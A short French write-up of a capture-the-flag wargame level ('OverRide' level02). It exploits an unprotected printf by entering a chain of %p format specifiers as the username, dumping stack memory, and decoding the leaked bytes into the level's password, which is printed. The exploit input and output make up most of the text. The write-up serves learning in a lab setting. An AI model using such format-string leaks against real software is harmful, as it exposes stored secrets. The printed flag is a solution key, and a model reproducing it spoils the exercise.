le programme nous demande un username et un password. On observe en +148 un appel a fopen du fichier .pass  et est stocker sur la stack.
On remarque aussi un appel a printf non protege que l'on va exploiter afin de regarder ce que notre stack contient.

level02@OverRide:~$ ./level02
===== [ Secure Access System v1.0 ] =====
/***************************************\
| You must login to access this system. |
\***************************************/
--[ Username: %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
--[ Password: ***********************
0x7fffffffe500
(nil)
0x25
0x2a2a2a2a2a2a2a2a
0x2a2a2a2a2a2a2a2a
0x7fffffffe6f8
0x1f7ff9a08
0x7025207025207025
(nil)
(nil)
(nil)
(nil)
(nil)
(nil)
(nil)
(nil)
(nil)
(nil)
(nil)
0x100000000
(nil)
0x756e505234376848
0x45414a3561733951
0x377a7143574e6758
0x354a35686e475873
0x48336750664b394d
(nil)
0x7025207025207025
0x2520702520702520
0x2070252070252070
0x7025207025207025
0x2520702520702520
0x2070252070252070  does not have access!

On remarque :
0x756e505234376848
0x45414a3561733951
0x377a7143574e6758
0x354a35686e475873
0x48336750664b394d
qui ne ressemble pas a ce que l'on a a cote, on le converti en ascii en appliquant un reverse du a l'endian
et on obtient :
Hh74RPnu
Q9sa5JAE
XgNWCqz7
sXGnh5J5
M9KfPg3H

qui est notre flag
Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H
